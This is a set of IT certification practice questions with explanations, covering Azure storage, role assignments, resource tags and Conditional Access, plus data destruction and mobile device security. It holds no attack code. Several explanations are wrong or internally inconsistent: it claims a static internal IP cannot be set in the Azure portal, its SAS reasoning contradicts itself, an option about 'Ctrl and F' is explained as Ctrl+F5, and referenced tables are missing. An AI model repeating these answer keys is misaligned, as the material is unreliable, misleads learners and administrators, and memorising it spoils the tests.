Why Use Azure Files for Persistent Storage in an Azure Container Instance? Understanding the Scenario You are deploying Container1, an Azure Container Instance (ACI). The container will use Image1, which contains Microsoft SQL Server. SQL Server requires persistent storage to maintain data even if the container restarts or is redeployed. Storage Options Analysis Azure Blob Storage (Option A) ? Used for unstructured data (e.g., images, videos, backups). Does not support file system-level access, which SQL Server requires. Not suitable for database storage. Azure Files (Option B) ? Provides fully managed SMB/NFS file shares in the cloud. Supports persistent storage for containerized applications. SQL Server can mount the file share as a persistent volume, allowing data to persist across container restarts. Best choice for hosting databases in Azure Container Instances. Azure Queue Storage (Option C) ? Used for message queuing between application components. Does not support file system access or persistent storage. Not suitable for SQL Server. Azure Table Storage (Option D) ? Used for NoSQL key-value storage. Not designed for structured relational database storage. Not suitable for SQL Server.
You have an Azure Storage account named storage. You have an Azure Service app named App1 and an app named App2 that runs in an Azure container instance. Each app uses a managed identity. You need to ensure that App1 and App2 can read blobs from storage1. The solution must meet the following requirements + Minimize the number of secrets used + Ensure that App2 can only read from storage1 for the next 30 days. What should you configure in storage1 for each app?
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 30 days
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 1 day
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 7 days
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 365 days
Why Use a Shared Access Signature (SAS) with a 30-Day Expiration? Understanding the Scenario Storage Account: storage1 contains blobs that App1 and App2 need to read. Security Requirements: Minimize the number of secrets used ? Use SAS tokens instead of static credentials. Ensure App2 can only read for 30 days ? The access must expire after this period. Why Choose a Shared Access Signature (SAS)? A Shared Access Signature (SAS) is a time-limited and permission-controlled access token that grants access to Azure Storage resources without exposing account keys. SAS allows you to restrict access permissions (e.g., read-only). It also has an expiration date, which ensures that access automatically revokes after a set period. This helps to minimize security risks by limiting long-term access. Why a 30-Day Expiration? App2’s access should expire in 30 days, so it must have a time-limited SAS token. Any shorter expiration (e.g., 1 day or 7 days) would require frequent renewal, increasing management overhead. Any longer expiration (e.g., 365 days) would violate security best practices because it allows prolonged access. Alternative Approaches? Azure Role-Based Access Control (RBAC) with Managed Identities is typically a preferred approach for long-term, secure access control. However, since App2 only needs temporary access, SAS is the best option here.
You have an Azure subscription named Subscription that contains a resource group named RG1. In RG1, you create an internal load balancer named LB1 and a public load balancer named LB. You need to ensure that an administrator named Admin1 can manage LB1 and LB2. The solution must follow the principle of least privilege. Which role should you assign to Admin1 for each task? To add backend pool to LB1:
Contributor on LB1
Network Contributor on LB1
Network Contributor on RG1
Owner on LB1
Why Assign “Network Contributor” on RG1? Understanding the Scenario You have two load balancers: LB1 (Internal Load Balancer) LB2 (Public Load Balancer) Admin1 needs to manage both LB1 and LB2. The solution must follow the “principle of least privilege”, meaning Admin1 should only get the necessary permissions without excessive access. The task: Add a backend pool to LB1. Role: “Network Contributor” on RG1 The “Network Contributor” role allows management of network resources (including load balancers, virtual networks, and network interfaces), but not other Azure resources like VMs or storage. Why assign it at the resource group (RG1) level instead of just LB1? Load balancers depend on backend pools, which consist of network interfaces attached to virtual machines. To add a backend pool, Admin1 needs permissions on both the load balancer and the network interfaces. If we only assigned Network Contributor on LB1, Admin1 would not have permissions on network interfaces. By assigning Network Contributor at RG1, Admin1 gets access to both LB1 and the associated network interfaces.
You have an Azure subscription named Subscription that contains a resource group named RG1. In RG1, you create an internal load balancer named LB1 and a public load balancer named LB. You need to ensure that an administrator named Admin1 can manage LB1 and LB2. The solution must follow the principle of least privilege. Which role should you assign to Admin1 for each task? To add health probe to LB2:
Contributor on LB2
Network Contributor on LB2
Network Contributor on RG1
Owner on LB2
Why Assign “Network Contributor” on RG1? Understanding the Scenario You have two load balancers: LB1 (Internal Load Balancer) LB2 (Public Load Balancer) Admin1 needs to manage LB1 and LB2. The task: Add a health probe to LB2. The solution must follow the principle of least privilege, meaning Admin1 should get only the required permissions without unnecessary access. Role: “Network Contributor” on RG1 The “Network Contributor” role allows managing network resources (including load balancers, network interfaces, virtual networks, and related configurations) without granting unnecessary permissions for other Azure resources. Why assign it at the resource group (RG1) level instead of just LB2? A health probe requires monitoring virtual machines or other network resources inside the resource group. To configure a health probe, Admin1 needs permissions on both the load balancer and the associated network interfaces of the backend VMs. Assigning Network Contributor on RG1 ensures Admin1 can manage both LB1 and LB2, along with their backend resources (such as VMs and NICs).
The bank that you are working for has a policy to physically destroy hard drives that are no longer needed. What is NOT a physical destruction method for hard drives?
Drilling
Incinerating
Zero-filling
Shredding
Zero-filling (also known as zero-writing) is not a physical destruction method — it’s a logical data sanitization technique. It involves overwriting the entire hard drive with zeros to erase the existing data, making recovery difficult. However, the drive remains physically intact and potentially reusable. On the other hand, drilling, incinerating, and shredding are all physical destruction methods that render the drive unusable and irrecoverable, aligning with strict data destruction policies like those in banking environments.
You have an Azure subscription that contains the resources shown in the following table: To RG6, you apply the tag: RGroup: RGS. You deploy a virtual network named VNET2 to RG6. Which tags apply to VNET1 and VNET2? To answer, select the appropriate options in the answer area. VNET1:
None
Department: D1 only
Department D1 and RGroup: RG6 only
Department D1 and Label: Value 1 only
Department D1 and RGroup: RG6 and Labe; Value 1
Understanding the Tags and Policy Applied VNET1 is in RG6 and has the tag Department: D1 assigned to it. A policy is applied to RG6 that appends a tag Label: Value 1 to all resources within RG6. The tag RGroup: RG6 is manually applied only to RG6, not directly to its resources. Analyzing VNET1 Tags “Department: D1” is already assigned to VNET1 (this does not change). “Label: Value 1” is added to all resources in RG6 due to the policy (this means VNET1 receives this tag). “RGroup: RG6” is not inherited by VNET1, because resource group tags do not automatically propagate to resources within them. Thus, VNET1 has the tags: ? Department: D1 (pre-existing tag) ? Label: Value 1 (added by the policy) Correct Answer for VNET1: ? “Department: D1 and Label: Value 1 only” Analyzing VNET2 Tags VNET2 is deployed to RG6, where the policy applies. Since VNET2 does not have any pre-existing tags, it inherits only the tag added by the policy. “Label: Value 1” is added to VNET2 due to the policy.
You have an Azure subscription that contains the resources shown in the following table: To RG6, you apply the tag: RGroup: RGS. You deploy a virtual network named VNET2 to RG6. Which tags apply to VNET1 and VNET2? To answer, select the appropriate options in the answer area. VNET2:
None
RGroup: RG6 only
Label: Value 1 only
RGroup: RG6 and Label: Value 1
Understanding the Tags and Policy Applied VNET2 is deployed in RG6, which has the tag RGroup: RG6. A policy is applied to RG6 that appends the tag Label: Value 1 to all resources within RG6. Resource Group (RG6) tags do not automatically propagate to resources within it unless explicitly inherited by a policy. Analyzing VNET2 Tags “Label: Value 1” is assigned to all resources in RG6 due to the policy (so VNET2 gets this tag). “RGroup: RG6” is applied only to RG6 itself but is not inherited by VNET2. Thus, VNET2 has the tag: ? Label: Value 1 (added by the policy)
Your company has two on-premises servers named SRVO1 and SRV02. Developers have created an application that runs on SRVO1. The application calls a service on SRVO2 by IP address. You plan to migrate the application to Azure virtual machines (VMs). You have configured two VMs on a single subnet in an Azure virtual network. You need to configure the two VMs with static internal IP addresses. What should you do?
Run the New-AzureRMVMConfig PowerShell cmdlet
Run the Set-AzureSubnet PowerShell cmdlet
Modify the VM properties in the Azure Management Portal
Modify the VM properties in the Azure Management Portal
Run the Set-AzureStaticVNetIP PowerShell cmdlet
The company has two on-premises servers (SRV01 and SRV02) running an application. The application on SRV01 calls SRV02 using an IP address. The goal is to migrate the application to Azure virtual machines (VMs) while ensuring static internal IP addresses for both VMs. Why Static Internal IPs are Required? In Azure, VMs get dynamic private IP addresses by default. However, since the application calls SRV02 using an IP address, using a dynamic IP could cause connectivity issues when the IP changes. Static private IPs ensure that the application’s configuration remains unchanged after migration. Why Use Set-AzureStaticVNetIP? The Set-AzureStaticVNetIP PowerShell cmdlet assigns a static private IP address to an Azure VM. This cmdlet ensures that the VM retains the assigned private IP address within the virtual network (VNet). This is the correct approach for assigning internal static IPs to Azure VMs. Why Other Options Are Incorrect? New-AzureRMVMConfig (Option A): This cmdlet is used for creating a VM configuration before deployment. It does not assign a static private IP to an already deployed VM. Set-AzureSubnet (Option B): This cmdlet configures subnets in an Azure virtual network but does not set static IPs for VMs. Modifying VM Properties in Azure Portal (Option C): While some VM settings can be changed via the Azure portal, configuring a static internal IP requires PowerShell or Azure CLI. Modifying IP Properties in Windows Network and Sharing Center (Option D): Azure VMs get their private IPs from the VNet DHCP server. Manually setting an IP inside Windows will not work and may cause connectivity issues.
You want to implement a Microsoft Entra ID conditional access policy. The policy must be configured to require members of the Global Administrators group to use Multi-Factor Authentication and a Microsoft Entra ID-joined device when they connect to Microsoft Entra ID from untrusted locations. Solution: You access the multi-factor authentication page to alter the user settings. Does the solution meet the goal?
Yes
No
You need to enforce a Conditional Access policy that requires: Global Administrators to use Multi-Factor Authentication (MFA). Access from untrusted locations must require a Microsoft Entra ID-joined device. Why Accessing the MFA Page to Alter User Settings Does Not Meet the Goal? The Multi-Factor Authentication (MFA) user settings page only allows basic MFA configurations, such as: Enabling/disabling MFA for individual users. Selecting MFA authentication methods (SMS, Authenticator app, etc.). Managing trusted IPs. It does not allow enforcing conditions like requiring Microsoft Entra ID-joined devices or restricting access from untrusted locations. What is the Correct Approach? You need to create a Conditional Access policy in Microsoft Entra ID with the following settings: Target Users: Select “Global Administrators.” Conditions: Configure “Locations” to target untrusted locations. Access Controls: Require both: Multi-Factor Authentication (MFA). Microsoft Entra ID-joined device. Enable Policy: Set the policy to enforce these rules. Why Other Methods Wouldn’t Work? MFA user settings (incorrect approach) ? Only applies basic MFA, does not enforce device compliance or location-based conditions. Correct approach (Conditional Access Policy) ? Allows fine-grained control over MFA, trusted devices, and access locations.
You want to implement a Microsoft Entra ID conditional access policy. The policy must be configured to require members of the Global Administrators group to use Multi-Factor Authentication and a Microsoft Entra ID-joined device when they connect to Microsoft Entra ID from untrusted locations Solution: You access the Microsoft Entra portal to alter the grant control of the Microsoft Entra ID conditional access policy. Does the solution meet the goal?
Yes
No
You need to implement a Conditional Access policy that enforces: Multi-Factor Authentication (MFA) for Global Administrators. Access from untrusted locations must require a Microsoft Entra ID-joined device. Why Altering the Grant Control in the Microsoft Entra Conditional Access Policy Meets the Goal? Conditional Access policies in Microsoft Entra ID allow administrators to configure fine-grained access control based on: User roles (e.g., Global Administrators). Sign-in conditions (e.g., untrusted locations). Access requirements (e.g., MFA, device compliance, or Microsoft Entra ID-joined devices). Grant controls in Conditional Access policies enforce additional security measures before granting access. Steps to Implement the Correct Conditional Access Policy: Go to Microsoft Entra Admin Center. Navigate to Security > Conditional Access. Create a New Policy: Assignments ? Select Global Administrators. Conditions ? Configure Locations to target untrusted locations. Grant Access Controls ? Require: ? Multi-Factor Authentication (MFA). ? Microsoft Entra ID-joined device. Enable the Policy and Save. Why This Meets the Goal? By modifying the Grant Controls, you can enforce both MFA and device-based access restrictions for Global Administrators when accessing from untrusted locations. This ensures that the security requirements are met before granting access.
The employees at your company have to fill out and manually sign personnel documents. Paper copies of the signed documents are no longer needed after they have been scanned into a system. How should the paper documents be handled?
Place them in the trash.
Place them in the recycle bin.
Keep them in a locked cabinet.
Shred them.
When paper documents contain sensitive or personal information, such as signed personnel records, they should be shredded before disposal to prevent unauthorized access or identity theft. Shredding ensures the documents are destroyed and cannot be reconstructed or read by anyone after disposal. Throwing them in the trash or recycle bin—even if the information has been scanned—poses a security risk, and keeping them in a locked cabinet is unnecessary if digital copies are already stored securely.
You need to dispose of some outdated magnetic hard drives. What is the practice of clearing the data from a hard drive with a large magnet?
Zero writing
Overwriting
Degaussing
Incineration
Degaussing is the process of erasing data from a magnetic hard drive using a powerful magnet or electromagnetic field. This method disrupts the magnetic domains on the platters that store data, rendering the drive unreadable and unrecoverable. It is a fast and effective way to destroy data on magnetic storage devices, but it renders the drive unusable afterward, meaning it cannot be reused or resold.
You want to donate some old drives to a nonprofit organization. What should you use to set the drive’s data to be nothing but Os?
Format command
Drive-wiping software
Incinerating
Degaussing
When donating old drives, it’s critical to securely erase all data to protect sensitive information. Drive-wiping software (also known as data sanitization or disk erasure tools) securely overwrites all existing data — often replacing it with zeros (0s) — multiple times to ensure it’s not recoverable. Unlike the standard format command, which may leave data recoverable, drive-wiping software meets data sanitization standards like DoD 5220.22-M or NIST 800-88. Examples of drive-wiping software include: DBAN (Darik’s Boot and Nuke) Eraser CCleaner Drive Wiper
You are a contractor for a government entity. What is the best way to provide proof of data destruction when decommissioning old hard drives and computers?
Have the recycling center give you a receipt for the drives.
Hire a third-party vendor to do the destruction and provide a certificate of destruction and recycling.
Zero-write all the drives.
Destroy them within your company and show pictures of the destroyed drives.
When working as a contractor for a government entity, strict data handling and disposal protocols must be followed. The best way to provide official proof of data destruction is to: Use a certified third-party vendor that specializes in secure data destruction. Obtain a certificate of destruction, which formally documents that the hardware was destroyed in compliance with relevant laws, policies, and standards (such as NIST 800-88). Often, this includes recycling compliance documentation, which is important for environmental and regulatory purposes. This method ensures legal protection, traceability, and compliance with government data handling standards.
A user finds a new video card driver for his HP laptop on the HP site. What is the HP site an example of?
A trusted software source.
An untrusted software source.
An authenticator website.
Part of an access control list.
The HP website is a trusted software source because it is the official website of the company that manufactures the laptop (HP). When a user downloads software, drivers, or updates directly from the manufacturer’s official website, such as HP in this case, it is considered trusted because: Authenticity: HP is the legitimate source, ensuring that the drivers and software are authentic and specifically designed for your HP laptop model. Safety: Software from official sources is usually tested for security and functionality, reducing the risk of malware, viruses, or other security threats. Updates: HP will provide the most recent and compatible drivers that work with their hardware, ensuring the proper functioning of the laptop. Why the other options are incorrect: An untrusted software source: This would refer to downloading software from unofficial, third-party websites, which could potentially contain malicious software or incompatible drivers. In this case, since the source is HP’s own website, it’s not untrusted. An authenticator website: An authenticator website is typically used for verifying user identity (e.g., for two-factor authentication or managing credentials), not for downloading software or drivers. Part of an access control list: An access control list (ACL) is used to define permissions and control access to resources on a network or system. It is unrelated to the context of downloading drivers or software. Conclusion: The HP website is a trusted software source because it is the official, verified site from which you can safely download software and drivers for your HP laptop.
A network administrator recommends performing a low-level format to dispose of used hard drives. What distinguishes a low-level format from a standard format?
A modern low-level format fills the entire drive with zeros, returning it to factory mode. A standard format creates the file allocation table and root directory.
Standard formats are performed at the factory, and low-level formats are performed using the format command.
A standard format records the tracks and marks the start of each sector on each track. A low-level format creates the file allocation table and root directory.
Low-level formats are performed at the factory, and standard formats are performed using the format command.
This answer reflects the modern interpretation of “low-level format” commonly used today in data destruction contexts: A modern low-level format (often referred to as a zero-fill or secure erase) overwrites the entire disk with zeros or random data, effectively wiping all existing data and returning the drive to a factory-like state. It’s a secure way to remove data before disposal or reuse, making recovery extremely difficult. A standard format, such as the one run by the format command, does not completely erase all data. Instead, it deletes file system structures like the file allocation table (FAT) or master file table (MFT), which makes the data appear gone, but the actual files may still be recoverable using special software. This distinction is important when securely disposing of drives containing sensitive or confidential data.
You take numerous old hard drives that contained private information to a local company for destruction. The IT director requires proof that the drives were destroyed properly. What should you give him?
Hard drive fragments.
A certificate of destruction.
Photos of the destroyed hard drives.
A notarized letter from the disposal company.
A certificate of destruction is the official document provided by a certified data destruction company that verifies the hard drives were destroyed in compliance with data protection standards and regulations. It typically includes: The date of destruction The method of destruction used A list of serial numbers or asset tags of the destroyed devices The name of the company that performed the destruction This certificate serves as legal proof that your organization took the proper steps to securely dispose of sensitive data, helping meet compliance requirements like HIPAA, GDPR, or industry-specific security standards.
Your company has made the decision to permit employees to do company business using their own devices. The company will spend less on hardware as a result of this decision. Employees must sign an agreement with the company to use their personal devices. What is the name of this agreement?
Cell phone policy
MDM policy
Remote work policy
BYOD policy
BYOD stands for Bring Your Own Device. A BYOD policy is a formal agreement that allows employees to use their personal devices—such as smartphones, tablets, or laptops—for work-related activities. This policy outlines: What devices are permitted Security requirements (such as encryption and passcodes) The company’s rights regarding data access, monitoring, and remote wiping Employee responsibilities regarding acceptable use and data protection The main goal is to balance cost savings with security and compliance, ensuring that company data remains protected even on personal hardware.
Your new smartphone has a camera that allows you to authorize a transaction by merely looking at it. What is the name of this technology?
Pin code
Facial recognition
Fingerprint scanner
Device encryption
The technology that allows you to authorize a transaction by merely looking at your smartphone is facial recognition. This biometric authentication method uses the device’s camera to scan and recognize your face to verify your identity and grant access or authorize actions like payments or unlocking the device. Why the other options are incorrect: Pin code: Requires you to manually enter a numeric code, not facial recognition. Fingerprint scanner: Uses a fingerprint, not a face, to authenticate. Device encryption: Protects data stored on the device but doesn’t perform authentication by itself.
Your iPhone has been stolen. What should you do to make sure the thief cannot access your data?
Perform a remote backup.
Perform a remote wipe.
Enable BitLocker.
Enable full-device encryption.
When your iPhone is stolen, the best course of action is to perform a remote wipe using Find My iPhone (via iCloud or the Find My app). This action will remotely erase all data from your device, making it impossible for the thief to access your personal information. Why the other options are not correct: Perform a remote backup: This would save your data, but it doesn’t protect the stolen phone’s data from being accessed. Enable BitLocker: BitLocker is for encrypting drives on Windows devices, not for iPhones. Enable full-device encryption: While this is a good security measure to have enabled before the phone is stolen, it doesn’t help after the phone is lost. Remote wipe is necessary to immediately erase the data.
What is the least secure way to unlock a locked screen on a mobile device?
Pattern
Swipe
Facial recognition
PIN code
The swipe method is the least secure way to unlock a mobile device because it involves simply swiping the screen without requiring any form of authentication. There are no personal identifiers, passwords, or biometrics involved, making it easy for someone to access the device if it is left unattended. Why the others are more secure: Pattern: Requires drawing a specific shape, which is harder to guess than a swipe but still vulnerable to smudge attacks. Facial recognition: Uses biometric data to identify the user, providing a higher level of security. PIN code: Requires entering a specific number, which, although less secure than biometrics, is still more secure than a swipe.
You read company email on your smartphone. You want to prevent people from accessing your phone if you leave it somewhere. What is the first security layer you should put in place to prevent unauthorized access to your phone?
Remote wipe software
Screen lock
Multifactor authentication
Full-device encryption
The first security layer to protect your smartphone from unauthorized access is enabling a screen lock. This ensures that anyone who picks up your phone can’t access its contents without the correct PIN, password, pattern, fingerprint, or facial recognition. Why the others are important but not the first layer: Remote wipe software: Useful if the phone is lost or stolen, but doesn’t prevent initial access. Multifactor authentication: Protects individual apps or services, not the device itself. Full-device encryption: Secures stored data, but still requires a lock screen to prevent immediate access.
Which mobile device security method calls for entering a string of numbers?
Pattern
Facial recognition
Fingerprint scanner
PIN code
A PIN code (Personal Identification Number) is a string of numbers—usually 4 to 6 digits—used to unlock a mobile device or authenticate access. It’s a numeric alternative to passwords and is commonly used on phones and tablets for quick access. Why the others are incorrect: Pattern: Involves drawing a shape or path on a grid. Facial recognition: Uses the device’s camera to identify your face. Fingerprint scanner: Uses your fingerprint as a biometric identifier.
You’re connecting to your company’s network from home utilizing a digital security method. This security technique encrypts data before transferring it over a public network (the Internet), and your connection receives a corporate IP address much as you would if you were physically present in the workplace. What is this type of connection?
VPN
EFS
Firewall
BitLocker
A VPN (Virtual Private Network) is a technology that allows users to securely connect to a remote network, such as a company’s internal network, over the internet. It encrypts the data traffic, ensuring that the data being sent over a public network (like the internet) is secure and protected from potential eavesdropping or tampering. Encryption: The VPN encrypts data before sending it over the internet, which makes it secure and private. This means that any sensitive information, such as login credentials or corporate files, remains safe from unauthorized access. Corporate IP Address: When you connect to a company’s network through a VPN, your connection is assigned an internal corporate IP address, just like you would have if you were physically in the office. This allows you to access internal resources such as shared drives, intranet sites, and company applications as if you were on-site. Why the other options are incorrect: EFS (Encrypting File System): EFS is a file-level encryption feature for protecting data on individual files and folders, but it doesn’t provide a secure connection for accessing a network remotely. Firewall: A firewall is a security system that monitors and controls incoming and outgoing network traffic. It doesn’t directly provide secure remote access; it’s more focused on blocking unauthorized access. BitLocker: BitLocker is a full-disk encryption tool that protects data stored on a device. While it secures data on the local machine, it does not create a secure connection over a public network. Conclusion: A VPN is the correct method for securely connecting to your company’s network from a remote location, providing encryption and assigning a corporate IP address just as if you were on-site.
What is the method of logging into a mobile device in which someone can easily figure out your password using marks that your skin’s oils have left behind?
Facial recognition
Swipe
Fingerprint
Pattern
When using a pattern to unlock a mobile device, users often draw the same shape repeatedly on the screen. Over time, oils from the skin can leave visible smudge marks that reveal the pattern, especially under certain lighting. This makes it easier for someone to guess the unlock pattern just by observing the screen. Why the others are incorrect: Facial recognition: Biometric; no touch involved. Swipe: Not password-based; it’s a simple gesture without security. Fingerprint: Also biometric and does not involve drawing or repeated visible patterns on the screen.
To unlock your iPhone, you must enter a passcode. You want to configure your phone so that all data is deleted if the wrong passcode is entered 10 times in a row due to recent phone thefts around your office. Which feature enables you to do this?
Remote wipes
Screen locks
Failed login attempts restrictions.
Locator applications
The feature that automatically deletes all data after 10 incorrect passcode attempts on an iPhone is called “Failed login attempts restrictions”. This security setting is found under: Settings > Face ID & Passcode (or Touch ID & Passcode) > Erase Data (toggle ON) When enabled, the iPhone will erase all its data after 10 consecutive failed passcode attempts, which helps protect sensitive information in case the device is stolen. Why the other options are not correct for this function: Remote wipes: Allow you to erase the device manually from another device or using iCloud, but do not happen automatically after failed attempts. Screen locks: Simply prevent access without wiping data. Locator applications: Help you track or lock your device remotely but don’t automatically wipe data after failed passcode entries.
Your mobile device disappeared after you briefly turned your back in the coffee shop. Which method does not allow you to remotely wipe data on a mobile device?
Using MDM software.
Using Google Find My Device or Find iPhone app.
Disabling guest access.
Exceeding failed login restrictions.
Disabling guest access helps restrict unauthorized use of a device locally, but it does not provide any remote wipe capability if the device is lost or stolen. It’s a preventive measure, not a recovery or remote action tool. The other options do allow remote wiping: Using MDM (Mobile Device Management) software: Admins can remotely lock or wipe corporate devices through an MDM platform. Using Google Find My Device or Find iPhone app: These services allow users to locate, lock, and erase a lost device remotely. Exceeding failed login restrictions: On some devices, you can configure a setting to automatically wipe the device after a set number of failed login attempts. Key takeaway: To protect your data if a device is stolen, rely on tools like MDM or remote tracking apps, not local account settings like guest access.
What is a biometric authentication method that is most frequently used with mobile devices?
DNA lock
Fingerprint scan
Retina scan
Swipe lock
The most frequently used biometric authentication method on mobile devices is the fingerprint scan. It is: Fast and convenient for users. Widely supported on both Android and iOS devices. Reliable for unlocking phones, approving app installations, and authorizing payments. Why the other options are incorrect: DNA lock: Not a real or practical authentication method for mobile devices at this time. Retina scan: Though secure, it is less commonly used due to the need for specialized and expensive hardware. Swipe lock: Not a biometric method—it’s a basic screen lock gesture without actual identity verification. Key takeaway: Fingerprint scans balance security and convenience, making them the most commonly used biometric method on smartphones and tablets.
What is NOT a method to keep your mobile device secure?
Accept and install OS updates as soon as possible.
Use a remote backup application to safeguard your data in the event that you must wipe your phone.
Use a swipe to unlock a mobile device.
Install antivirus/anti-malware.
Using a swipe to unlock a mobile device is not a secure method of protection because it provides no authentication — anyone who picks up the device can unlock it instantly. This method doesn’t protect your personal information, emails, messages, or access to apps and accounts. Why the other options are secure methods: Accept and install OS updates as soon as possible: Updates often include security patches that fix vulnerabilities. Delaying updates can leave your device exposed to threats. Use a remote backup application: Backing up your data ensures that if your phone is lost, stolen, or needs to be wiped, you can recover important files and settings. Install antivirus/anti-malware: These tools help protect your device from malicious apps, websites, and downloads, reducing the risk of data breaches or infections. Key takeaway: For better security, always use strong authentication methods (like PIN, password, facial recognition, or fingerprint), not simple swipes.
There are various mobile devices, such as phones, laptops, and smart watches, between you and your family members. It would be convenient to have a simple way to locate a phone because people frequently forget where they put it or it may be stolen. You also want to know where other family members are when they are around town. What kind of app will let you do that?
Remote control app
Firewall app
Locator app
Trusted source app
A locator app is specifically designed to track the location of mobile devices such as phones, laptops, and smartwatches. These apps use GPS, Wi-Fi, and cellular data to provide real-time location information. They are ideal for: Finding lost or stolen devices (e.g., “Find My iPhone” for Apple devices or “Find My Device” for Android). Tracking the location of family members for safety and convenience. Some popular examples include: Apple’s Find My (for iPhones, iPads, and Apple Watches) Google’s Find My Device (for Android phones and tablets) Life360 (for family location sharing and tracking) Why the other options are incorrect: Remote control app: Allows you to control another device remotely (like a TV or computer), but not typically used for tracking location. Firewall app: Protects your device from unauthorized network traffic but has no tracking capability. Trusted source app: This isn’t a specific type of app—it refers more to the origin of an app (i.e., downloading from a secure source), not its function. Key takeaway: Use a locator app to track devices and family members’ locations conveniently and securely.
A dozen Windows workstations are part of the network you manage. To prevent users from booting to an unauthorized device, you should make sure they cannot change the boot order. What should you do?
Enable a strong password policy.
Set a BIOS/UEFI password.
Disable Autorun.
Restrict user permissions.
To prevent users from changing the boot order and booting to an unauthorized device (such as a USB drive or external hard drive), the best approach is to set a BIOS/UEFI password. This password will restrict unauthorized access to the system’s BIOS/UEFI settings, where users can change the boot order. By enforcing this password, only authorized users (such as administrators) will be able to modify the system’s boot settings, ensuring that devices like USB drives cannot be used to boot an operating system or exploit vulnerabilities. Why the other options are less effective: Enable a strong password policy: While a strong password policy helps with user account security, it does not directly affect the BIOS/UEFI settings or prevent users from altering the boot order. A password policy governs user logins, not hardware or system settings. Disable Autorun: Disabling Autorun helps prevent unauthorized programs or malware from automatically running when a device is connected (like a USB drive). However, it doesn’t prevent a user from booting from an unauthorized device in the first place. Setting a BIOS/UEFI password is a more direct way to secure the boot process. Restrict user permissions: Restricting user permissions on the operating system level (Windows) ensures that users cannot perform unauthorized actions within the OS, but it does not control the boot process or prevent users from accessing the BIOS/UEFI settings to change the boot order. BIOS/UEFI security settings are separate from OS-level permissions. Key Takeaway: The best way to ensure that users cannot change the boot order is to set a BIOS/UEFI password, which secures the hardware configuration settings and prevents unauthorized booting from external devices.
You are using your desktop computer to browse a web page you frequently visit. You discover a website that you know should be updating but it doesn’t appear to be. When you use another device to access the website, it looks different. What are the TWO things you can do to force the website to update on your computer?
Hold the Ctrl Key and F key simultaneously while on the website.
Clear the browser’s cache.
Clear the browser’s stored cookies.
Uninstall and reinstall your browser.
Clear the browser’s cache: The cache stores temporary files like images, scripts, and stylesheets from websites you’ve visited, which helps improve loading times. However, when a website is updated but your browser is still showing the old version from the cache, clearing the cache forces the browser to request the updated version of the website from the server. Clear the browser’s stored cookies: Cookies are small pieces of data stored by the browser, typically used for storing login credentials, user preferences, or tracking information. Sometimes outdated cookies can cause issues where the website might not display the latest content (such as showing old session information or cached data tied to user sessions). By clearing cookies, you remove these stored values, which might allow the website to load the latest version of its content, particularly if the website is user-specific or session-dependent. Why the other options are incorrect: Hold the Ctrl Key and F5 key simultaneously: While this does perform a “hard refresh” and can clear the cache for that page temporarily, it does not necessarily remove all cached data or cookies. It’s a quick way to force a reload of the page, but it doesn’t have the same effect as clearing both the cache and cookies, which are more thorough methods of ensuring the most up-to-date content. Uninstall and reinstall your browser: This step would clear all of your settings and browsing data but is unnecessary for simply updating the website content. This action is much more drastic than clearing just the cache and cookies, which are the more targeted solutions for this problem. Conclusion: To force a website to update on your computer, clearing both the browser’s cache and cookies ensures that all outdated data is removed, forcing the browser to load the most recent version of the website.
A Windows workstation has been given to a workgroup. What are the two best practices for maximizing security of the Administrator account?
Disable the Administrator account.
Rename the Administrator account.
Remove the Administrator account from the Administrators group.
Require a strong password.
Rename the Administrator account: By default, Windows has an Administrator account that is well-known and targeted by attackers. Renaming this account helps obscure its identity, making it harder for attackers to exploit it in a brute-force attack or other attack vectors. It’s one of the first steps in improving security, as it reduces the chance of an attacker guessing the account name. Require a strong password: A strong password is a fundamental security best practice. The Administrator account is highly privileged, and using a strong, complex password (with a combination of upper and lowercase letters, numbers, and special characters) helps prevent unauthorized access. Weak or easily guessable passwords make it much easier for attackers to gain control of the system. Why the other options are less effective: Disable the Administrator account: Disabling the Administrator account can create issues for legitimate administrative tasks. While it is a security measure to disable unused accounts, completely disabling the Administrator account is not ideal because it can complicate recovery or system maintenance. Instead, it’s better to rename it and set a strong password, so it remains secure but functional when needed. Remove the Administrator account from the Administrators group: The Administrator account is a critical account that is required for performing administrative functions. Removing it from the Administrators group would prevent legitimate administrative actions from being performed, and it would likely cause operational problems. It’s more important to secure the account with a strong password and rename it. Key Takeaway: To maximize security for the Administrator account in a workgroup, you should rename the account to obscure it from attackers and require a strong password to prevent unauthorized access.
You work in a secure environment. Although network-wide data encryption has been implemented, you wish to encrypt all the data on users’ storage drives, including laptop drives, to stop information from being shared in the event that the drives are compromised or stolen. What is NOT a good way to encrypt this data-at-rest?
Use EFS and let the employee choose what to encrypt.
Use a third-party encryption solution.
Use MDM software.
Use BitLocker on desktop systems.
While EFS (Encrypting File System) is a tool available in Windows to encrypt individual files or folders, it is not ideal for encrypting all data-at-rest on a user’s storage drive, especially in a secure environment where consistency and centralized control are crucial. Allowing users to choose what to encrypt could lead to inconsistent encryption practices and gaps in security, particularly if some files or folders are not encrypted properly. Additionally, EFS only encrypts files that are stored locally on the device, and it may not provide sufficient protection if the user doesn’t apply it properly. Why the other options are better: Use a third-party encryption solution: A reputable third-party encryption solution can provide full disk encryption (FDE), which ensures that all data on the device (including system files) is encrypted automatically. This method is more comprehensive and consistent, especially for mobile devices like laptops, which may be more prone to theft or compromise. Use MDM software: Mobile Device Management (MDM) software can enforce security policies, including enabling full disk encryption on devices. It allows IT administrators to centrally manage encryption settings and ensure all devices are properly encrypted, reducing the risk of data exposure from stolen or compromised devices. Use BitLocker on desktop systems: BitLocker is a full disk encryption tool built into Windows Pro and Enterprise editions. It provides strong encryption for all data on the disk, including system files and user data, and it can be centrally managed in a corporate environment, making it an excellent solution for encrypting data-at-rest. Key Takeaway: For better security and compliance in a secure environment, it’s important to use full disk encryption solutions like BitLocker or third-party tools, rather than relying on user-controlled encryption like EFS, which might be incomplete or inconsistent.
When adding new users to your network, make sure to inform them that their user passwords must meet complexity requirements and be changed the first time they log in. According to password best practices, what is INCORRECT?
At least one of each of these should be used: upper- and lowercase letters, numbers, and special characters.
Passwords that are four characters long are okay if they are complex.
Longer passwords are better.
Password minimum length is eight characters.
